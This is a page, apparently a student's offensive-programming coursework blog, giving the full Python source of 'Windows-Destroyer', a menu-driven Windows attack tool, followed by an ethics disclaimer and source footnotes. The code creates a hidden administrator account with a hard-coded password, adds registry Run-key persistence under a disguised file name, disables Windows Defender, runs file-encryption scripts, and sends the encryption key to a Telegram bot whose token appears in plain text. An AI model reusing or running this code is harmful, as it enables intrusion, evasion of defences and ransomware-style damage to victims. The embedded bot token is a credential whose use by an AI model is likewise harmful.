WINDOWS-DESTROYER.PY – Terminal Based (Info & Details) Ongeveer dezelfde functies, alleen nu bedienbaar vanaf het Terminal, dit heb ik gedaan omdat het zo makkelijker om te zetten is naar Windows, Limux of MacOS (Unix) Systemen. Windows-Destroyer is dus specifiek gericht op Windows Systemen. Page 36 of 46 Page 37 of 46 #! "C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\env\Scripts\python" #peter oldenburger - Windows-destroyer.py - Offensive Programming Blok3 # Importeer benodigde bibliotheken en modules import os #functionaliteiten zoals het lezen of schrijven van bestanden, manipuleren van paden import shutil #bestandsbeheer import subprocess #nieuwe processen te starten, verbinding te maken met hun input/output/error pipes en de returncodes op te halen import sys #toegang tot sommige variabelen die door de interpreter worden gebruikt en functies die sterk interageren met de interpreter. import winreg #Biedt toegang tot de Windows Register Database voor het lezen, schrijven, en verwijderen van registerwaarden en -sleutels. import winreg as reg import logging #raamwerk voor het uitvoeren van logboekregistratie in applicaties en bibliotheken. import ctypes #Staat interactie toe met C-code. import requests #het maken van HTTP-aanvragen om gegevens van het internet te krijgen of te versturen # Activeer de virtuele omgeving def activate_virtual_environment(env_path): """Activate the virtual environment.""" if sys.platform.startswith('win'): activate_script = os.path.join(env_path, 'Scripts', 'activate.bat') else: activate_script = os.path.join(env_path, 'bin', 'activate') subprocess.call([activate_script], shell=True) env_path = r'C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\env' activate_virtual_environment(env_path) # Verkrijg beheerdersrechten from elevate import elevate elevate() # logging logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') # Controleer of een gebruikersaccount bestaat def check_user_exists(username): """Check if a user exists on the system.""" try: subprocess.run(["net", "user", username], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) return True except subprocess.CalledProcessError: return False Page 38 of 46 # Vestig persistentie in het register def establish_persistence(): """Establish persistence by adding a registry entry.""" curr_executable = sys.executable app_data = os.getenv("APPDATA") to_save_file = os.path.join(app_data, "system32_data.exe") if not os.path.exists(to_save_file): shutil.copyfile(curr_executable, to_save_file) key = winreg.HKEY_CURRENT_USER key_value = r"Software\Microsoft\Windows\CurrentVersion\Run" with winreg.OpenKey(key, key_value, 0, winreg.KEY_ALL_ACCESS) as key_obj: winreg.SetValueEx(key_obj, "systemfilex64", 0, winreg.REG_SZ, to_save_file) logging.info("Persistence established.") else: logging.info("Executable already present.") # Controleer of persistentie is gevestigd def check_persistence(): """Check if persistence is established.""" app_data = os.getenv("APPDATA") persistence_path = os.path.join(app_data, "system32_data.exe") try: key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run") value, = winreg.QueryValueEx(key, "systemfilex64") if value == persistencepath: return True except FileNotFoundError: pass return False # Voeg een administratieve gebruiker toe def add_admin_user(username, password): """Add a new user and grant admin privileges.""" try: # Nieuwe gebruiker subprocess.run(["net", "user", username, password, "/add"], check=True) # voeg de nieuwe gebruiker toe aan de Administrators group subprocess.run(["net", "localgroup", "Administrators", username, "/add"], check=True) logging.info(f"User {username} added as an Administrator.") except subprocess.CalledProcessError as e: logging.error(f"Failed to add user {username}. Error: {e}") # Verkrijg het IP-adres van het slachtoffer def get_victim_ip(): """Get the victim's IP address.""" try: ip = subprocess.run(["ipconfig"], check=True, capture_output=True, text=True) logging.info(f"Victim's IP address:\n{ip.stdout}") except subprocess.CalledProcessError as e: Page 39 of 46 logging.error(f"Failed to get victim's IP address. Error: {e}") # Ping Slachtoffer (om te kijken of die online is, etc) def ping_victim(): """Ping een doelwit op basis van het opgegeven IP-adres.""" ip_address = input("Voer het IP-adres van het slachtoffer in: ").strip() try: # Voer het ping commando uit, ping het IP-adres 10 keer response = subprocess.run(["ping", ip_address, "-n", "10"], check=True, text=True, capture_output=True) print(response.stdout) logging.info(f"DutchJinn > Ping succesvol uitgevoerd op {ip_address}") except subprocess.CalledProcessError as e: logging.error(f"Fout tijdens het pingen van {ip_address}. Error: {e}") print(f"Fout tijdens het pingen. Zie logbestand voor meer details.") # Controleer de status van Windows Defender def check_windows_defender_status(): """Check the status of Windows Defender on the victim.""" try: subprocess.run(["powershell", "-Command", "Get-MpPreference | Select-Object ExpandProperty DisableRealtimeMonitoring"], check=True) except subprocess.CalledProcessError as e: logging.error(f"Failed to check Windows Defender status. Error: {e}") # Schakel Windows Defender uit def disable_windows_defender(): """Disable Windows Defender on the victim.""" try: subprocess.run(["powershell", "-Command", "Set-MpPreference -DisableRealtimeMonitoring $true"], check=True) logging.info("Windows Defender disabled on victim.") except subprocess.CalledProcessError as e: logging.error(f"Failed to disable Windows Defender. Error: {e}") # Schakel Windows Defender in (xxx) def enable_windows_defender(): pass # Controleer of de admin gebruiker bestaat def check_admin_user(): """Check if the admin user exists on the victim.""" username = "dutchjinn" if check_user_exists(username): logging.info("Admin present: dutchjinn") else: logging.info("Admin not present.") Page 40 of 46 # Maak een admin gebruiker aan def create_admin_user(): """Create an admin user on the victim.""" username = "dutchjinn" password = "hackeR888!" if not check_user_exists(username): add_admin_user(username, password) else: logging.info("Admin already present.") # Controleer persistentie def check_persistence_victim(): """Check if persistence is established on the victim.""" if check_persistence(): logging.info("Persistence activated") else: logging.info("Persistence not activated") # Vestig persistentie def create_persistence_victim(): """Establish persistence on the victim.""" establish_persistence() # Stel het bureaubladachtergrond in def set_wallpaper(path): """Set the wallpaper to the specified image path and apply the 'Fit' style.""" set_wallpaper_style() ctypes.windll.user32.SystemParametersInfoW(20, 0, path, 3) # Stel de style van het bureaubladachtergrond in def set_wallpaper_style(): """Set the wallpaper style in the registry to 'Fit'.""" key_path = r"Control Panel\Desktop" try: key = reg.OpenKey(reg.HKEY_CURRENT_USER, key_path, 0, reg.KEY_WRITE) reg.SetValueEx(key, "WallpaperStyle", 0, reg.REG_SZ, "6") # Use "3" if "6" does not work as expected reg.SetValueEx(key, "TileWallpaper", 0, reg.REG_SZ, "0") reg.CloseKey(key) except Exception as e: print(f"Failed to set wallpaper style: {e}") # Voer Notepad Script uit def execute_destroy_1_notepad(): """Executes the external script 'destroy-1-notepad.py'""" script_path = os.path.join(os.getcwd(), 'destroy-1-notepad.py') try: subprocess.run([sys.executable, script_path], check=True) logging.info("'destroy-1-notepad.py' executed successfully.") except subprocess.CalledProcessError as e: Page 41 of 46 logging.error(f"Failed to execute 'destroy-1-notepad.py'. Error: {e}") # Run Script def run_script(script_name): """Runs a script based on the given script name.""" script_path = os.path.join(os.getcwd(), script_name) try: subprocess.run([sys.executable, script_path], check=True) logging.info(f"{script_name} executed successfully.") except subprocess.CalledProcessError as e: logging.error(f"Failed to execute {script_name}. Error: {e}") # Toon en Exporteer Key naar opgegeven directory = oud vervangen door export naar telegram def display_and_export_key(): key_file_path = "encryption_key.key" export_directory = input("Enter the directory to export the key to: ").strip() if not os.path.isdir(export_directory): print(f"The directory {export_directory} does not exist.") return try: with open(key_file_path, 'rb') as key_file: key = key_file.read() print(f"Encryption Key: {key.hex()}") export_path = os.path.join(export_directory, os.path.basename(key_file_path)) with open(export_path, 'wb') as export_file: export_file.write(key) print(f"Key exported successfully to {export_path}") except FileNotFoundError: print("Encryption key file not found.") except Exception as e: print(f"An error occurred: {str(e)}") # Voer uit: export-key.py script / Oud = vervangen door exporteer key naar Telegram def run_export_key_script(): """Runs the export-key.py script.""" script_name = "export-key.py" try: subprocess.run([sys.executable, script_name], check=True) logging.info(f"{script_name} executed successfully.") except subprocess.CalledProcessError as e: logging.error(f"Failed to execute {script_name}. Error: {e}") #Exporteer Crypt-Key naar Telegram def send_key_to_telegram(): """Sends the encryption key to the specified Telegram chat.""" bot_token = "6672103339:AAHQrAHVnH32XU-0-EOVhWaE0gKyMWLr2Mo" chat_id = "5517521840" key_file_path = "encryption_key.key" Page 42 of 46 try: with open(key_file_path, 'rb') as file: key_data = file.read() key_hex = key_data.hex() message = f"Encryption Key: {key_hex}" url = f"https://api.telegram.org/bot{bot_token}/sendMessage" data = {'chat_id': chat_id, 'text': message} response = requests.post(url, data=data) if response.status_code == 200: print("Key successfully sent to Telegram.") logging.info("Key successfully sent to Telegram.") else: print("Failed to send key to Telegram.") logging.error("Failed to send key to Telegram. Status Code: " + str(response.status_code)) except FileNotFoundError: print("Encryption key file not found.") logging.error("Encryption key file not found.") except Exception as e: print(f"An error occurred: {e}") logging.error(f"An error occurred when sending key to Telegram: {e}") # Toon DutchJinn Main-Menu def display_menu(): """Display the main menu.""" print("Menu:") print("1. Get victim's IP") print("2. Ping victim") print("3. Check Status Windows Defender, $true=disabled - $false=enabled.") print("4. Disable Windows Defender on victim") print("5. Enable Windows Defender on victim") print("6. Check admin user on victim") print("7. Create admin user on victim") print("8. Check persistence on victim") print("9. Create persistence on victim") print("10. Set DutchJinn888 Wallpaper") print("11. Execute 'Destroy Code 1 - Notepad x5'") print("12. Destroy 2 - Encrypt Files - (in DIR: Encrypt-This)") print("13. Destroy 2 - Decrypt Files - (in DIR: Encrypt-This)") print("14. Export Crypt-Key to Telegram") print("0. Exit") # main def main(): if check_persistence(): logging.info("Persistence activated") else: logging.info("Activating persistence...") while True: display_menu() Page 43 of 46 choice = input("DutchJinn Windows Destroyer - Enter your choice: ").strip() if choice == "1": get_victim_ip() elif choice == "2": ping_victim() elif choice == "3": check_windows_defender_status() elif choice == "4": disable_windows_defender() elif choice == "5": enable_windows_defender() elif choice == "6": check_admin_user() elif choice == "7": create_admin_user() elif choice == "8": check_persistence_victim() elif choice == "9": create_persistence_victim() elif choice == "10": wallpaper_path = r'wallpaper888.jpg' set_wallpaper(wallpaper_path) print("Wallpaper has been set successfully.") elif choice == "11": execute_destroy_1_notepad() elif choice == "12": print("Encrypting Files in 'Encrypt-This'...") run_script("destroy-2-encrypt.py") elif choice == "13": print("Decrypting Files in 'Encrypt-This'...") run_script("destroy-2-decrypt.py") elif choice == "14": send_key_to_telegram() elif choice == "0": print("Exiting and returning to main menu...") main_py_path = os.path.join(os.path.dirname(__file__), 'main.py') subprocess.Popen([sys.executable, main_py_path]) sys.exit() break else: print("Invalid choice. Please enter a valid option.") if choice not in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14']: print("Invalid choice. Please enter a valid option.") continue if name == "__main__": main() INTERCEPTOR-X FINAL Interceptor-X is een krachtige toolkit te zijn die diverse mogelijkheden biedt voor cybersecurity experts en ethische hackers. De integratie met Telegram biedt een unieke manier om controle en feedback op afstand te hebben, wat vooral handig kan zijn tijdens penetration testing of beveiligingsaudits. Hier zijn enkele slotgedachten over deze tool en het gebruik ervan: Ethiek en Legaliteit: Het is van cruciaal belang dat dergelijke tools uitsluitend binnen ethische grenzen en in overeenstemming met de wet worden gebruikt. Ze moeten alleen ingezet worden in gecontroleerde omgevingen met expliciete toestemming van de betrokken partijen. Misbruik kan leiden tot ernstige juridische en morele consequenties. Educatief Potentieel: Voor educatieve doeleinden biedt dit script een uitstekende gelegenheid om de werking van cybersecurity-aanvallen en verdedigingen te leren begrijpen. Het kan dienen als een praktische tool in cybersecurity-cursussen, mits gebruikt in een veilige en gecontroleerde omgeving. Veiligheidstesten: Voor professionele security testers biedt het een scala aan functies die nuttig kunnen zijn bij het uitvoeren van uitgebreide beveiligingstests. De mogelijkheid om taken op afstand te besturen en realtime feedback te krijgen kan de efficiëntie van beveiligingstests verbeteren. Verbetering en Aanpassing: Aangezien het script open-source lijkt te zijn, biedt het mogelijkheden voor aanpassing en verbetering door de community. Gebruikers kunnen nieuwe functies toevoegen of bestaande optimaliseren om aan specifieke behoeften te voldoen. Risico op Misbruik: De krachtige functionaliteit van het script brengt het risico op misbruik met zich mee. Ontwikkelaars en gebruikers moeten zich bewust zijn van deze risico's en stappen ondernemen om misbruik te voorkomen, zoals het beperken van de distributie en het implementeren van veiligheidscontroles. Peter Oldenburger Amsterdam 2024 Page 44 of 46 INTERCEPTOR-X DISCLAIMER Hey there! Before you start leveraging the power of Interceptor-X, we need to have a quick chat about responsibility. This tool, while powerful, must be used in a manner that respects both the law and the digital environment. Not all systems and networks welcome penetration testing or security analysis, and we're committed to upholding a standard of respect and legality. So, let's lay down some ground rules: Review Permissions: Always check if the target network or system has explicitly allowed security testing. This might be outlined in their security policy or terms of use. Ethical Use Only: Use Interceptor-X solely on systems that have authorized such activities. Ethical hacking isn't just about adhering to legal requirements; it's about maintaining the trust and safety of the digital community. Stay Informed: Policies and permissions can evolve. Make sure to stay updated on any changes regarding the permissions of the systems you're testing. Remember, utilizing Interceptor-X in a way that honors the consent of system owners and adheres to legal standards is not only prudent—it's imperative. Let's ensure our actions contribute positively to the cybersecurity ecosystem. CyberSecurityAD.com Made with in Cyberspace > by Peter Oldenburger > copyright 2024 Page 45 of 46 FOOTNOTES 1. GitHub: repository voor Python Keylogging voorbeelden. 2. SourceForge: screen capture functionaliteit in Python demonstreren. 3. OpenAI: documentatie over het verwerken van video input met machine learning. 4. GitHub: projecten die audio opname scripts in Python beschikbaar stellen. 5. DLO: PYTHON_PENETRATION_TESTING_ESSENTIALS_SECOND_EDITION - netwerk. 6. SourceForge: netwerk tools voor IP-management en netwerk diagnose. 7. NetworkChuck: GitHub repositories met encryptie en decryptie tools geschreven in Python. 8. NullByte: over het belang van data encryptie en veilige opslag. 9. GitHub: voor het implementeren van cryptografische sleuteluitwisseling over Telegram. 10. DLO: Destroy Code - notepad script. 11. OpenAI: tutorials over het manipuleren van de desktopomgeving met Python. 12. GitHub: broncode van gebruikersrechten binnen Windows omgevingen. 13. Reddit: administrator rechten binnen cybersecurity. 14. DLO: Michael Drent - DHCP-Starvation HoeDoeIkDit. Page 46 of 46

6 views0 comments

Recent Posts

See All

Openbaar Ministerie

Datum: 04 – 04 - 2024 Betreft: Data Weledelgestrenge Heer/Vrouw, Enkele maanden geleden heb ik reeds het initiatief genomen om per brief contact met u op te nemen, met de vraag een onderzoek in te ste

dhcp python script

#!/usr/bin/env python# Aangepast script met DHCP-verzoeken# (Shreyas Damle's script als inspiratie)import timefrom scapy.all import * def main():    layer2_broadcast = "ff:ff:ff:ff:ff:ff"    conf.chec

Commentaires


bottom of page